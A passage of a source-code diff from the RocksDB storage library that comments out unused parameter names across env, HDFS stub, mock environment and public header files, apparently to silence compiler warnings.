/*prefixLength*/, + size_t /*blockSize*/) { // Nothing to do here, put in custom data in override when needed. return 0; } @@ -898,8 +902,10 @@ Status CTREncryptionProvider::CreateCipherStream(const std::string& fname, const // CreateCipherStreamFromPrefix creates a block access cipher stream for a file given // given name and options. The given prefix is already decrypted. -Status CTREncryptionProvider::CreateCipherStreamFromPrefix(const std::string& fname, const EnvOptions& options, - uint64_t initialCounter, const Slice& iv, const Slice& prefix, unique_ptr* result) { +Status CTREncryptionProvider::CreateCipherStreamFromPrefix( + const std::string& /*fname*/, const EnvOptions& /*options*/, + uint64_t initialCounter, const Slice& iv, const Slice& /*prefix*/, + unique_ptr* result) { (*result) = unique_ptr(new CTRCipherStream(cipher_, iv.data(), initialCounter)); return Status::OK(); } diff --git a/env/env_hdfs.cc b/env/env_hdfs.cc index d98020c76b3..6dbbd86273d 100644 --- a/env/env_hdfs.cc +++ b/env/env_hdfs.cc @@ -598,13 +598,13 @@ Status NewHdfsEnv(Env** hdfs_env, const std::string& fsname) { // dummy placeholders used when HDFS is not available namespace rocksdb { - Status HdfsEnv::NewSequentialFile(const std::string& fname, - unique_ptr* result, - const EnvOptions& options) { - return Status::NotSupported("Not compiled with hdfs support"); +Status HdfsEnv::NewSequentialFile(const std::string& /*fname*/, + unique_ptr* /*result*/, + const EnvOptions& /*options*/) { + return Status::NotSupported("Not compiled with hdfs support"); } - Status NewHdfsEnv(Env** hdfs_env, const std::string& fsname) { + Status NewHdfsEnv(Env** /*hdfs_env*/, const std::string& /*fsname*/) { return Status::NotSupported("Not compiled with hdfs support"); } } diff --git a/env/env_test.cc b/env/env_test.cc index 7fd71a3c430..8606bb12a11 100644 --- a/env/env_test.cc +++ b/env/env_test.cc @@ -1248,33 +1248,36 @@ TEST_P(EnvPosixTestWithParam, WritableFileWrapper) { inc(0); } - Status Append(const Slice& data) override { inc(1); return Status::OK(); } - Status Truncate(uint64_t size) override { return Status::OK(); } + Status Append(const Slice& /*data*/) override { + inc(1); + return Status::OK(); + } + Status Truncate(uint64_t /*size*/) override { return Status::OK(); } Status Close() override { inc(2); return Status::OK(); } Status Flush() override { inc(3); return Status::OK(); } Status Sync() override { inc(4); return Status::OK(); } Status Fsync() override { inc(5); return Status::OK(); } - void SetIOPriority(Env::IOPriority pri) override { inc(6); } + void SetIOPriority(Env::IOPriority /*pri*/) override { inc(6); } uint64_t GetFileSize() override { inc(7); return 0; } - void GetPreallocationStatus(size_t* block_size, - size_t* last_allocated_block) override { + void GetPreallocationStatus(size_t* /*block_size*/, + size_t* /*last_allocated_block*/) override { inc(8); } - size_t GetUniqueId(char* id, size_t max_size) const override { + size_t GetUniqueId(char* /*id*/, size_t /*max_size*/) const override { inc(9); return 0; } - Status InvalidateCache(size_t offset, size_t length) override { + Status InvalidateCache(size_t /*offset*/, size_t /*length*/) override { inc(10); return Status::OK(); } protected: - Status Allocate(uint64_t offset, uint64_t len) override { + Status Allocate(uint64_t /*offset*/, uint64_t /*len*/) override { inc(11); return Status::OK(); } - Status RangeSync(uint64_t offset, uint64_t nbytes) override { + Status RangeSync(uint64_t /*offset*/, uint64_t /*nbytes*/) override { inc(12); return Status::OK(); } diff --git a/env/io_posix.cc b/env/io_posix.cc index c5b14d3effe..cf96795c443 100644 --- a/env/io_posix.cc +++ b/env/io_posix.cc @@ -443,7 +443,7 @@ PosixMmapReadableFile::~PosixMmapReadableFile() { } Status PosixMmapReadableFile::Read(uint64_t offset, size_t n, Slice* result, - char* scratch) const { + char* /*scratch*/) const { Status s; if (offset > length_) { *result = Slice(); @@ -922,7 +922,7 @@ size_t PosixWritableFile::GetUniqueId(char* id, size_t max_size) const { */ PosixRandomRWFile::PosixRandomRWFile(const std::string& fname, int fd, - const EnvOptions& options) + const EnvOptions& /*options*/) : filename_(fname), fd_(fd) {} PosixRandomRWFile::~PosixRandomRWFile() { diff --git a/env/io_posix.h b/env/io_posix.h index 69c98438f27..e83f2df7332 100644 --- a/env/io_posix.h +++ b/env/io_posix.h @@ -201,7 +201,7 @@ class PosixMmapFile : public WritableFile { // Means Close() will properly take care of truncate // and it does not need any additional information - virtual Status Truncate(uint64_t size) override { return Status::OK(); } + virtual Status Truncate(uint64_t /*size*/) override { return Status::OK(); } virtual Status Close() override; virtual Status Append(const Slice& data) override; virtual Status Flush() override; diff --git a/env/mock_env.cc b/env/mock_env.cc index 79a4f8c44a6..b59047bdeb6 100644 --- a/env/mock_env.cc +++ b/env/mock_env.cc @@ -445,8 +445,8 @@ MockEnv::~MockEnv() { // Partial implementation of the Env interface. Status MockEnv::NewSequentialFile(const std::string& fname, - unique_ptr* result, - const EnvOptions& soptions) { + unique_ptr* result, + const EnvOptions& /*soptions*/) { auto fn = NormalizePath(fname); MutexLock lock(&mutex_); if (file_map_.find(fn) == file_map_.end()) { @@ -462,8 +462,8 @@ Status MockEnv::NewSequentialFile(const std::string& fname, } Status MockEnv::NewRandomAccessFile(const std::string& fname, - unique_ptr* result, - const EnvOptions& soptions) { + unique_ptr* result, + const EnvOptions& /*soptions*/) { auto fn = NormalizePath(fname); MutexLock lock(&mutex_); if (file_map_.find(fn) == file_map_.end()) { @@ -480,7 +480,7 @@ Status MockEnv::NewRandomAccessFile(const std::string& fname, Status MockEnv::NewRandomRWFile(const std::string& fname, unique_ptr* result, - const EnvOptions& soptions) { + const EnvOptions& /*soptions*/) { auto fn = NormalizePath(fname); MutexLock lock(&mutex_); if (file_map_.find(fn) == file_map_.end()) { @@ -523,8 +523,8 @@ Status MockEnv::NewWritableFile(const std::string& fname, return Status::OK(); } -Status MockEnv::NewDirectory(const std::string& name, - unique_ptr* result) { +Status MockEnv::NewDirectory(const std::string& /*name*/, + unique_ptr* result) { result->reset(new MockEnvDirectory()); return Status::OK(); } diff --git a/hdfs/env_hdfs.h b/hdfs/env_hdfs.h index 3a62bc8cb92..2ed6ba6d8a6 100644 --- a/hdfs/env_hdfs.h +++ b/hdfs/env_hdfs.h @@ -245,7 +245,7 @@ static const Status notsup; class HdfsEnv : public Env { public: - explicit HdfsEnv(const std::string& fsname) { + explicit HdfsEnv(const std::string& /*fsname*/) { fprintf(stderr, "You have not build rocksdb with HDFS support\n"); fprintf(stderr, "Please see hdfs/README for details\n"); abort(); @@ -258,112 +258,125 @@ class HdfsEnv : public Env { unique_ptr* result, const EnvOptions& options) override; - virtual Status NewRandomAccessFile(const std::string& fname, - unique_ptr* result, - const EnvOptions& options) override { + virtual Status NewRandomAccessFile(const std::string& /*fname*/, + unique_ptr* /*result*/, + const EnvOptions& /*options*/) override { return notsup; } - virtual Status NewWritableFile(const std::string& fname, - unique_ptr* result, - const EnvOptions& options) override { + virtual Status NewWritableFile(const std::string& /*fname*/, + unique_ptr* /*result*/, + const EnvOptions& /*options*/) override { return notsup; } - virtual Status NewDirectory(const std::string& name, - unique_ptr* result) override { + virtual Status NewDirectory(const std::string& /*name*/, + unique_ptr* /*result*/) override { return notsup; } - virtual Status FileExists(const std::string& fname) override { + virtual Status FileExists(const std::string& /*fname*/) override { return notsup; } - virtual Status GetChildren(const std::string& path, - std::vector* result) override { + virtual Status GetChildren(const std::string& /*path*/, + std::vector* /*result*/) override { return notsup; } - virtual Status DeleteFile(const std::string& fname) override { + virtual Status DeleteFile(const std::string& /*fname*/) override { return notsup; } - virtual Status CreateDir(const std::string& name) override { return notsup; } + virtual Status CreateDir(const std::string& /*name*/) override { + return notsup; + } - virtual Status CreateDirIfMissing(const std::string& name) override { + virtual Status CreateDirIfMissing(const std::string& /*name*/) override { return notsup; } - virtual Status DeleteDir(const std::string& name) override { return notsup; } + virtual Status DeleteDir(const std::string& /*name*/) override { + return notsup; + } - virtual Status GetFileSize(const std::string& fname, - uint64_t* size) override { + virtual Status GetFileSize(const std::string& /*fname*/, + uint64_t* /*size*/) override { return notsup; } - virtual Status GetFileModificationTime(const std::string& fname, - uint64_t* time) override { + virtual Status GetFileModificationTime(const std::string& /*fname*/, + uint64_t* /*time*/) override { return notsup; } - virtual Status RenameFile(const std::string& src, - const std::string& target) override { + virtual Status RenameFile(const std::string& /*src*/, + const std::string& /*target*/) override { return notsup; } - virtual Status LinkFile(const std::string& src, - const std::string& target) override { + virtual Status LinkFile(const std::string& /*src*/, + const std::string& /*target*/) override { return notsup; } - virtual Status LockFile(const std::string& fname, FileLock** lock) override { + virtual Status LockFile(const std::string& /*fname*/, + FileLock** /*lock*/) override { return notsup; } - virtual Status UnlockFile(FileLock* lock) override { return notsup; } + virtual Status UnlockFile(FileLock* /*lock*/) override { return notsup; } - virtual Status NewLogger(const std::string& fname, - shared_ptr* result) override { + virtual Status NewLogger(const std::string& /*fname*/, + shared_ptr* /*result*/) override { return notsup; } - virtual void Schedule(void (*function)(void* arg), void* arg, - Priority pri = LOW, void* tag = nullptr, - void (*unschedFunction)(void* arg) = 0) override {} + virtual void Schedule(void (*/*function*/)(void* arg), void* /*arg*/, + Priority /*pri*/ = LOW, void* /*tag*/ = nullptr, + void (*/*unschedFunction*/)(void* arg) = 0) override {} - virtual int UnSchedule(void* tag, Priority pri) override { return 0; } + virtual int UnSchedule(void* /*tag*/, Priority /*pri*/) override { return 0; } - virtual void StartThread(void (*function)(void* arg), void* arg) override {} + virtual void StartThread(void (*/*function*/)(void* arg), + void* /*arg*/) override {} virtual void WaitForJoin() override {} virtual unsigned int GetThreadPoolQueueLen( - Priority pri = LOW) const override { + Priority /*pri*/ = LOW) const override { return 0; } - virtual Status GetTestDirectory(std::string* path) override { return notsup; } + virtual Status GetTestDirectory(std::string* /*path*/) override { + return notsup; + } virtual uint64_t NowMicros() override { return 0; } - virtual void SleepForMicroseconds(int micros) override {} + virtual void SleepForMicroseconds(int /*micros*/) override {} - virtual Status GetHostName(char* name, uint64_t len) override { + virtual Status GetHostName(char* /*name*/, uint64_t /*len*/) override { return notsup; } - virtual Status GetCurrentTime(int64_t* unix_time) override { return notsup; } + virtual Status GetCurrentTime(int64_t* /*unix_time*/) override { + return notsup; + } - virtual Status GetAbsolutePath(const std::string& db_path, - std::string* outputpath) override { + virtual Status GetAbsolutePath(const std::string& /*db_path*/, + std::string* /*outputpath*/) override { return notsup; } - virtual void SetBackgroundThreads(int number, Priority pri = LOW) override {} - virtual int GetBackgroundThreads(Priority pri = LOW) override { return 0; } - virtual void IncBackgroundThreadsIfNeeded(int number, Priority pri) override { + virtual void SetBackgroundThreads(int /*number*/, + Priority /*pri*/ = LOW) override {} + virtual int GetBackgroundThreads(Priority /*pri*/ = LOW) override { + return 0; } - virtual std::string TimeToString(uint64_t number) override { return ""; } + virtual void IncBackgroundThreadsIfNeeded(int /*number*/, + Priority /*pri*/) override {} + virtual std::string TimeToString(uint64_t /*number*/) override { return ""; } virtual uint64_t GetThreadID() const override { return 0; diff --git a/include/rocksdb/cache.h b/include/rocksdb/cache.h index 5ebd66bde88..88efdb05eeb 100644 --- a/include/rocksdb/cache.h +++ b/include/rocksdb/cache.h @@ -189,7 +189,8 @@ class Cache { // Mark the last inserted object as being a raw data block. This will be used // in tests. The default implementation does nothing. - virtual void TEST_mark_as_data_block(const Slice& key, size_t charge) {} + virtual void TEST_mark_as_data_block(const Slice& /*key*/, + size_t /*charge*/) {} private: // No copying allowed diff --git a/include/rocksdb/compaction_filter.h b/include/rocksdb/compaction_filter.h index 9a8c0318c5d..94069a91490 100644 --- a/include/rocksdb/compaction_filter.h +++ b/include/rocksdb/compaction_filter.h @@ -97,8 +97,10 @@ class CompactionFilter { // The last paragraph is not true if you set max_subcompactions to more than // 1. In that case, subcompaction from multiple threads may call a single // CompactionFilter concurrently. - virtual bool Filter(int level, const Slice& key, const Slice& existing_value, - std::string* new_value, bool* value_changed) const { + virtual bool Filter(int /*level*/, const Slice& /*key*/, + const Slice& /*existing_value*/, + std::string* /*new_value*/, + bool* /*value_changed*/) const { return false; } @@ -111,8 +113,8 @@ class CompactionFilter { // may not realize there is a write conflict and may allow a Transaction to // Commit that should have failed. Instead, it is better to implement any // Merge filtering inside the MergeOperator. - virtual bool FilterMergeOperand(int level, const Slice& key, - const Slice& operand) const { + virtual bool FilterMergeOperand(int /*level*/, const Slice& /*key*/, + const Slice& /*operand*/) const { return false; } @@ -157,7 +159,7 @@ class CompactionFilter { // MergeOperator. virtual Decision FilterV2(int level, const Slice& key, ValueType value_type, const Slice& existing_value, std::string* new_value, - std::string* skip_until) const { + std::string* /*skip_until*/) const { switch (value_type) { case ValueType::kValue: { bool value_changed = false; diff --git a/include/rocksdb/db.h b/include/rocksdb/db.h index ee5706b4c8b..7c1cc316ef3 100644 --- a/include/rocksdb/db.h +++ b/include/rocksdb/db.h @@ -855,7 +855,7 @@ class DB { // Flush the WAL memory buffer to the file. If sync is true, it calls SyncWAL // afterwards. - virtual Status FlushWAL(bool sync) { + virtual Status FlushWAL(bool /*sync*/) { return Status::NotSupported("FlushWAL not implemented"); } // Sync the wal. Note that Write() followed by SyncWAL() is not exactly the diff --git a/include/rocksdb/env.h b/include/rocksdb/env.h index 8690738998f..78864dd7982 100644 --- a/include/rocksdb/env.h +++ b/include/rocksdb/env.h @@ -170,9 +170,9 @@ class Env { // returns non-OK. // // The returned file will only be accessed by one thread at a time. - virtual Status ReopenWritableFile(const std::string& fname, - unique_ptr* result, - const EnvOptions& options) { + virtual Status ReopenWritableFile(const std::string& /*fname*/, + unique_ptr* /*result*/, + const EnvOptions& /*options*/) { return Status::NotSupported(); } @@ -187,9 +187,9 @@ class Env { // *result and returns OK. On failure returns non-OK. // // The returned file will only be accessed by one thread at a time. - virtual Status NewRandomRWFile(const std::string& fname, - unique_ptr* result, - const EnvOptions& options) { + virtual Status NewRandomRWFile(const std::string& /*fname*/, + unique_ptr* /*result*/, + const EnvOptions& /*options*/) { return Status::NotSupported("RandomRWFile is not implemented in this Env"); } @@ -257,7 +257,8 @@ class Env { const std::string& target) = 0; // Hard Link file src to target. - virtual Status LinkFile(const std::string& src, const std::string& target) { + virtual Status LinkFile(const std::string& /*src*/, + const std::string& /*target*/) { return Status::NotSupported("LinkFile is not supported for this Env"); } @@ -308,7 +309,7 @@ class Env { // Arrange to remove jobs for given arg from the queue_ if they are not // already scheduled. Caller is expected to have exclusive lock on arg. - virtual int UnSchedule(void* arg, Priority pri) { return 0; } + virtual int UnSchedule(void* /*arg*/, Priority /*pri*/) { return 0; } // Start a new thread, invoking "function(arg)" within the new thread. // When "function(arg)" returns, the thread will be destroyed. @@ -318,7 +319,7 @@ class Env { virtual void WaitForJoin() {} // Get thread pool queue length for specific thread pool. - virtual unsigned int GetThreadPoolQueueLen(Priority pri = LOW) const { + virtual unsigned int GetThreadPoolQueueLen(Priority /*pri*/ = LOW) const { return 0; } @@ -372,7 +373,7 @@ class Env { virtual void IncBackgroundThreadsIfNeeded(int number, Priority pri) = 0; // Lower IO priority for threads from the specified pool. - virtual void LowerThreadPoolIOPriority(Priority pool = LOW) {} + virtual void LowerThreadPoolIOPriority(Priority /*pool*/ = LOW) {} // Converts seconds-since-Jan-01-1970 to a printable string virtual std::string TimeToString(uint64_t time) = 0; @@ -416,7 +417,7 @@ class Env { const ImmutableDBOptions& db_options) const; // Returns the status of all threads that belong to the current Env. - virtual Status GetThreadList(std::vector* thread_list) { + virtual Status GetThreadList(std::vector* /*thread_list*/) { return Status::NotSupported("Not supported."); } @@ -482,14 +483,14 @@ class SequentialFile { // Remove any kind of caching of data from the offset to offset+length // of this file. If the length is 0, then it refers to the end of file. // If the system is not caching the file contents, then this is a noop. - virtual Status InvalidateCache(size_t offset, size_t length) { + virtual Status InvalidateCache(size_t /*offset*/, size_t /*length*/) { return Status::NotSupported("InvalidateCache not supported."); } // Positioned Read for direct I/O // If Direct I/O enabled, offset, n, and scratch should be properly aligned - virtual Status PositionedRead(uint64_t offset, size_t n, Slice* result, - char* scratch) { + virtual Status PositionedRead(uint64_t /*offset*/, size_t /*n*/, + Slice* /*result*/, char* /*scratch*/) { return Status::NotSupported(); } }; @@ -515,7 +516,7 @@ class RandomAccessFile { char* scratch) const = 0; // Readahead the file starting from offset by n bytes for caching. - virtual Status Prefetch(uint64_t offset, size_t n) { + virtual Status Prefetch(uint64_t /*offset*/, size_t /*n*/) { return Status::OK(); } @@ -534,14 +535,14 @@ class RandomAccessFile { // a single varint. // // Note: these IDs are only valid for the duration of the process. - virtual size_t GetUniqueId(char* id, size_t max_size) const { + virtual size_t GetUniqueId(char* /*id*/, size_t /*max_size*/) const { return 0; // Default implementation to prevent issues with backwards // compatibility. }; enum AccessPattern { NORMAL, RANDOM, SEQUENTIAL, WILLNEED, DONTNEED }; - virtual void Hint(AccessPattern pattern) {} + virtual void Hint(AccessPattern /*pattern*/) {} // Indicates the upper layers if the current RandomAccessFile implementation // uses direct IO. @@ -554,7 +555,7 @@ class RandomAccessFile { // Remove any kind of caching of data from the offset to offset+length // of this file. If the length is 0, then it refers to the end of file. // If the system is not caching the file contents, then this is a noop. - virtual Status InvalidateCache(size_t offset, size_t length) { + virtual Status InvalidateCache(size_t /*offset*/, size_t /*length*/) { return Status::NotSupported("InvalidateCache not supported."); } }; @@ -604,9 +605,7 @@ class WritableFile { // before closing. It is not always possible to keep track of the file // size due to whole pages writes. The behavior is undefined if called // with other writes to follow. - virtual Status Truncate(uint64_t size) { - return Status::OK(); - } + virtual Status Truncate(uint64_t /*size*/) { return Status::OK(); } virtual Status Close() = 0; virtual Status Flush() = 0; virtual Status Sync() = 0; // sync data @@ -668,7 +667,7 @@ class WritableFile { } // For documentation, refer to RandomAccessFile::GetUniqueId() - virtual size_t GetUniqueId(char* id, size_t max_size) const { + virtual size_t GetUniqueId(char* /*id*/, size_t /*max_size*/) const { return 0; // Default implementation to prevent issues with backwards } @@ -676,7 +675,7 @@ class WritableFile { // of this file. If the length is 0, then it refers to the end of file. // If the system is not caching the file contents, then this is a noop. // This call has no effect on dirty pages in the cache. - virtual Status InvalidateCache(size_t offset, size_t length) { + virtual Status InvalidateCache(size_t /*offset*/, size_t /*length*/) { return Status::NotSupported("InvalidateCache not supported."); } @@ -686,7 +685,9 @@ class WritableFile { // This asks the OS to initiate flushing the cached data to disk, // without waiting for completion. // Default implementation does nothing. - virtual Status RangeSync(uint64_t offset, uint64_t nbytes) { return Status::OK(); } + virtual Status RangeSync(uint64_t /*offset*/, uint64_t /*nbytes*/) { + return Status::OK(); + } // PrepareWrite performs any necessary preparation for a write // before the write actually occurs. This allows for pre-allocation @@ -713,7 +714,7 @@ class WritableFile { } // Pre-allocates space for a file. - virtual Status Allocate(uint64_t offset, uint64_t len) { + virtual Status Allocate(uint64_t /*offset*/, uint64_t /*len*/) { return Status::OK(); } diff --git a/include/rocksdb/filter_policy.h b/include/rocksdb/filter_policy.h index 8c813d93e65..d442837e61e 100644 --- a/include/rocksdb/filter_policy.h +++ b/include/rocksdb/filter_policy.h @@ -45,7 +45,7 @@ class FilterBitsBuilder { virtual Slice Finish(std::unique_ptr* buf) = 0; // Calculate num of entries fit into a space. - virtual int CalculateNumEntry(const uint32_t space) { + virtual int CalculateNumEntry(const uint32_t /*space*/) { #ifndef ROCKSDB_LITE throw std::runtime_error("CalculateNumEntry not Implemented"); #else @@ -114,7 +114,8 @@ class FilterPolicy { // Get the FilterBitsReader, which is ONLY used for full filter block // It contains interface to tell if key can be in filter // The input slice should NOT be deleted by FilterPolicy - virtual FilterBitsReader* GetFilterBitsReader(const Slice& contents) const { + virtual FilterBitsReader* GetFilterBitsReader( + const Slice& /*contents*/) const { return nullptr; } }; diff --git a/include/rocksdb/iterator.h b/include/rocksdb/iterator.h index 4e09f64e9a6..cb734eccd93 100644 --- a/include/rocksdb/iterator.h +++ b/include/rocksdb/iterator.h @@ -51,7 +51,7 @@ class Iterator : public Cleanable { // Position at the last key in the source that at or before target // The iterator is Valid() after this call iff the source contains // an entry that comes at or before target. - virtual void SeekForPrev(const Slice& target) {} + virtual void SeekForPrev(const Slice& /*target*/) {} // Moves to the next entry in the source. After this call, Valid() is // true iff the iterator was not positioned at the last entry in the source. diff --git a/include/rocksdb/listener.h b/include/rocksdb/listener.h index 40d318e0941..b44c7a6900f 100644 --- a/include/rocksdb/listener.h +++ b/include/rocksdb/listener.h @@ -345,8 +345,8 @@ class EventListener { // returns. Otherwise, RocksDB may be blocked. // @param handle is a pointer to the column family handle to be deleted // which will become a dangling pointer after the deletion. - virtual void OnColumnFamilyHandleDeletionStarted(ColumnFamilyHandle* handle) { - } + virtual void OnColumnFamilyHandleDeletionStarted( + ColumnFamilyHandle* /*handle*/) {} // A call-back function for RocksDB which will be called after an external // file is ingested using IngestExternalFile. diff --git a/include/rocksdb/memtablerep.h b/include/rocksdb/memtablerep.h index 347dd3096c2..1256515d570 100644 --- a/include/rocksdb/memtablerep.h +++ b/include/rocksdb/memtablerep.h @@ -89,14 +89,14 @@ class MemTableRep { // // Currently only skip-list based memtable implement the interface. Other // implementations will fallback to Insert() by default. - virtual void InsertWithHint(KeyHandle handle, void** hint) { + virtual void InsertWithHint(KeyHandle handle, void** /*hint*/) { // Ignore the hint by default. Insert(handle); } // Like Insert(handle), but may be called concurrent with other calls // to InsertConcurrently for other handles - virtual void InsertConcurrently(KeyHandle handle) { + virtual void InsertConcurrently(KeyHandle /*handle*/) { #ifndef ROCKSDB_LITE throw std::runtime_error("concurrent insert not supported"); #else @@ -128,8 +128,8 @@ class MemTableRep { virtual void Get(const LookupKey& k, void* callback_args, bool (*callback_func)(void* arg, const char* entry)); - virtual uint64_t ApproximateNumEntries(const Slice& start_ikey, - const Slice& end_key) { + virtual uint64_t ApproximateNumEntries(const Slice& /*start_ikey*/, + const Slice& /*end_key*/) { return 0; } diff --git a/include/rocksdb/merge_operator.h b/include/rocksdb/merge_operator.h index 5fe3e0bfda8..c32249ee8fa 100644 --- a/include/rocksdb/merge_operator.h +++ b/include/rocksdb/merge_operator.h @@ -66,11 +66,9 @@ class MergeOperator { // internal corruption. This will be treated as an error by the library. // // Also make use of the *logger for error messages. - virtual bool FullMerge(const Slice& key, - const Slice* existing_value, - const std::deque& operand_list, - std::string* new_value, - Logger* logger) const { + virtual bool FullMerge(const Slice& /*key*/, const Slice* /*existing_value*/, + const std::deque& /*operand_list*/, + std::string* /*new_value*/, Logger* /*logger*/) const { // deprecated, please use FullMergeV2() assert(false); return false; @@ -145,9 +143,10 @@ class MergeOperator { // If there is corruption in the data, handle it in the FullMergeV2() function // and return false there. The default implementation of PartialMerge will // always return false. - virtual bool PartialMerge(const Slice& key, const Slice& left_operand, - const Slice& right_operand, std::string* new_value, - Logger* logger) const { + virtual bool PartialMerge(const Slice& /*key*/, const Slice& /*left_operand*/, + const Slice& /*right_operand*/, + std::string* /*new_value*/, + Logger* /*logger*/) const { return false; } diff --git a/include/rocksdb/rate_limiter.h b/include/rocksdb/rate_limiter.h index 838c98a6de6..995bf952f9f 100644 --- a/include/rocksdb/rate_limiter.h +++ b/include/rocksdb/rate_limiter.h @@ -45,7 +45,7 @@ class RateLimiter { // Request for token for bytes. If this request can not be satisfied, the call // is blocked. Caller is responsible to make sure // bytes <= GetSingleBurstBytes() - virtual void Request(const int64_t bytes, const Env::IOPriority pri) { + virtual void Request(const int64_t /*bytes*/, const Env::IOPriority /*pri*/) { assert(false); } diff --git a/include/rocksdb/slice.h b/include/rocksdb/slice.h index fe8dee00f04..b45f95c10b7 100644 --- a/include/rocksdb/slice.h +++ b/include/rocksdb/slice.h @@ -173,7 +173,7 @@ class PinnableSlice : public Slice, public Cleanable { } } - void remove_prefix(size_t n) { + void remove_prefix(size_t /*n*/) { assert(0); // Not implemented } diff --git a/include/rocksdb/slice_transform.h b/include/rocksdb/slice_transform.h index fc82bf58456..2143057df8d 100644 --- a/include/rocksdb/slice_transform.h +++ b/include/rocksdb/slice_transform.h @@ -58,7 +58,7 @@ class SliceTransform { virtual bool InDomain(const Slice& key) const = 0; // This is currently not used and remains here for backward compatibility. - virtual bool InRange(const Slice& dst) const { return false; } + virtual bool InRange(const Slice& /*dst*/) const { return false; } // Transform(s)=Transform(`prefix`) for any s with `prefix` as a prefix. // @@ -83,7 +83,7 @@ class SliceTransform { // "abcd,e", the file can be filtered out and the key will be invisible. // // i.e., an implementation always returning false is safe. - virtual bool SameResultWhenAppended(const Slice& prefix) const { + virtual bool SameResultWhenAppended(const Slice& /*prefix*/) const { return false; } }; diff --git a/include/rocksdb/statistics.h b/include/rocksdb/statistics.h index b4629358e66..ad395cae475 100644 --- a/include/rocksdb/statistics.h +++ b/include/rocksdb/statistics.h @@ -445,7 +445,7 @@ class Statistics { virtual uint64_t getTickerCount(uint32_t tickerType) const = 0; virtual void histogramData(uint32_t type, HistogramData* const data) const = 0; - virtual std::string getHistogramString(uint32_t type) const { return ""; } + virtual std::string getHistogramString(uint32_t /*type*/) const { return ""; } virtual void recordTick(uint32_t tickerType, uint64_t count = 0) = 0; virtual void setTickerCount(uint32_t tickerType, uint64_t count) = 0; virtual uint64_t getAndResetTickerCount(uint32_t tickerType) = 0; diff --git a/include/rocksdb/utilities/geo_db.h b/include/rocksdb/utilities/geo_db.h index 408774c5990..ec3cbdf265a 100644 --- a/include/rocksdb/utilities/geo_db.h +++ b/include/rocksdb/utilities/geo_db.h @@ -80,7 +80,7 @@ class GeoDB : public StackableDB { // GeoDB owns the pointer `DB* db` now. You should not delete it or // use it after the invocation of GeoDB // GeoDB(DB* db, const GeoDBOptions& options) : StackableDB(db) {} - GeoDB(DB* db, const GeoDBOptions& options) : StackableDB(db) {} + GeoDB(DB* db, const GeoDBOptions& /*options*/) : StackableDB(db) {} virtual ~GeoDB() {} // Insert a new object into the location database. The object is diff --git a/include/rocksdb/utilities/optimistic_transaction_db.h b/include/rocksdb/utilities/optimistic_transaction_db.h index 02917ff5830..518bc610c6d 100644 --- a/include/rocksdb/utilities/optimistic_transaction_db.h +++ b/include/rocksdb/utilities/optimistic_transaction_db.h @@ -62,7 +62,7 @@ class OptimisticTransactionDB { protected: // To Create an OptimisticTransactionDB, call Open() - explicit OptimisticTransactionDB(DB* db) {} + explicit OptimisticTransactionDB(DB* /*db*/) {} OptimisticTransactionDB() {} private: diff --git a/include/rocksdb/utilities/transaction.h b/include/rocksdb/utilities/transaction.h index 8507ef133fb..a461c9e856a 100644 --- a/include/rocksdb/utilities/transaction.h +++ b/include/rocksdb/utilities/transaction.h @@ -402,8 +402,8 @@ class Transaction { virtual bool IsDeadlockDetect() const { return false; } - virtual std::vector GetWaitingTxns(uint32_t* column_family_id, - std::string* key) const { + virtual std::vector GetWaitingTxns( + uint32_t* /*column_family_id*/, std::string* /*key*/) const { assert(false); return std::vector(); } @@ -423,7 +423,7 @@ class Transaction { void SetState(TransactionState state) { txn_state_ = state; } protected: - explicit Transaction(const TransactionDB* db) {} + explicit Transaction(const TransactionDB* /*db*/) {} Transaction() {} // the log in which the prepared section for this txn resides diff --git a/include/rocksdb/wal_filter.h b/include/rocksdb/wal_filter.h index 686fa499893..a22dca92377 100644 --- a/include/rocksdb/wal_filter.h +++ b/include/rocksdb/wal_filter.h @@ -44,8 +44,8 @@ class WalFilter { // @params cf_name_id_map column_family_name to column_family_id map virtual void ColumnFamilyLogNumberMap( - const std::map& cf_lognumber_map, - const std::map& cf_name_id_map) {} + const std::map& /*cf_lognumber_map*/, + const std::map& /*cf_name_id_map*/) {} // LogRecord is invoked for each log record encountered for all the logs // during replay on logs on recovery. This method can be used to: @@ -75,11 +75,9 @@ class WalFilter { // @returns Processing option for the current record. // Please see WalProcessingOption enum above for // details. - virtual WalProcessingOption LogRecordFound(unsigned long long log_number, - const std::string& log_file_name, - const WriteBatch& batch, - WriteBatch* new_batch, - bool* batch_changed) { + virtual WalProcessingOption LogRecordFound( + unsigned long long /*log_number*/, const std::string& /*log_file_name*/, + const WriteBatch& batch, WriteBatch* new_batch, bool* batch_changed) { // Default implementation falls back to older function for compatibility return LogRecord(batch, new_batch, batch_changed); } @@ -87,9 +85,9 @@ class WalFilter { // Please see the comments for LogRecord above. This function is for // compatibility only and contains a subset of parameters. // New code should use the function above. - virtual WalProcessingOption LogRecord(const WriteBatch& batch, - WriteBatch* new_batch, - bool* batch_changed) const { + virtual WalProcessingOption LogRecord(const WriteBatch& /*batch*/, + WriteBatch* /*new_batch*/, + bool* /*batch_changed*/) const { return WalProcessingOption::kContinueProcessing; } diff --git a/include/rocksdb/write_batch.h b/include/rocksdb/write_batch.h index 8bd93d36c4e..d708933f842 100644 --- a/include/rocksdb/write_batch.h +++ b/include/rocksdb/write_batch.h @@ -217,8 +217,9 @@ class WriteBatch : public WriteBatchBase { } virtual void SingleDelete(const Slice& /*key*/) {} - virtual Status DeleteRangeCF(uint32_t column_family_id, - const Slice& begin_key, const Slice& end_key) { + virtual Status DeleteRangeCF(uint32_t /*column_family_id*/, + const Slice& /*begin_key*/, + const Slice& /*end_key*/) { return Status::InvalidArgument("DeleteRangeCF not implemented"); } @@ -240,16 +241,16 @@ class WriteBatch : public WriteBatchBase { return Status::InvalidArgument("MarkBeginPrepare() handler not defined."); } - virtual Status MarkEndPrepare(const Slice& xid) { + virtual Status MarkEndPrepare(const Slice& /*xid*/) { return Status::InvalidArgument("MarkEndPrepare() handler not defined."); } - virtual Status MarkRollback(const Slice& xid) { + virtual Status MarkRollback(const Slice& /*xid*/) { return Status::InvalidArgument( "MarkRollbackPrepare() handler not defined."); } - virtual Status MarkCommit(const Slice& xid) { + virtual Status MarkCommit(const Slice& /*xid*/) { return Status::InvalidArgument("MarkCommit() handler not defined."); } diff --git a/memtable/hash_cuckoo_rep.cc b/memtable/hash_cuckoo_rep.cc index 034bf5858b6..39078633f67 100644 --- a/memtable/hash_cuckoo_rep.cc +++ b/memtable/hash_cuckoo_rep.cc @@ -597,8 +597,8 @@ void HashCuckooRep::Iterator::Seek(const Slice& user_key, } // Retreat to the last entry with a key <= target 